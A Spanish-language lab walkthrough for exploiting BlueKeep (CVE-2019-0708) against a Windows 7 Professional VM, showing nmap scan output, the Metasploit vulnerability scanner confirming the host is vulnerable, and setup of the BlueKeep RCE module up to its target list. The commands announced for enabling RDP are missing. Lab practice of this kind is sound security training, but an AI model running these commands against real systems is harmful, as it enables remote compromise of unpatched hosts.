Una vez que hayamos importado la ISO en VMWare, los pasos de configuracion seran los siguientes.
Dentro de Windows 7 en el menu de configuracion del inicio, seleccionaremos la siguiente edicion.
Windows 7 Professional
NOTA IMPORTANTE
Es importante elegir esta edicion, ya que de lo contrario no podremos obtener el puerto RPD (3389) para hacer nuestras pruebas de penetracion con el exploit BlueKeep.
Seguimos los siguientes pasos de normal.
Una vez dentro abrimos el cmd como administrador y pondremos los siguientes coamndos para habilitar el puerto RPD (3389).
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-26 12:46 CEST
Nmap scan report for 192.168.5.140
Host is up (0.00042s latency).
PORT STATE SERVICE VERSION
3389/tcp open tcpwrapped
| ssl-cert: Subject: commonName=exploitbluekeep
| Not valid before: 2024-07-25T10:44:48
|_Not valid after: 2025-01-24T10:44:48
MAC Address: 00:0C:29:24:51:3E (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.91 seconds
msfconsole -q
search bluekeep
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
show options
set RHOSTS <IP>
run
[+] 192.168.5.140:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 192.168.5.140:3389 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
search bluekeep
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
show options
set RHOSTS <IP>
show targets
Exploit targets:
=================
Id Name
-- ----
=> 0 Automatic targeting via fingerprinting
1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
2 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox 6)
3 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 14)
4 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15)
5 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15.1)
6 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)
7 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS)
8 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - QEMU/KVM)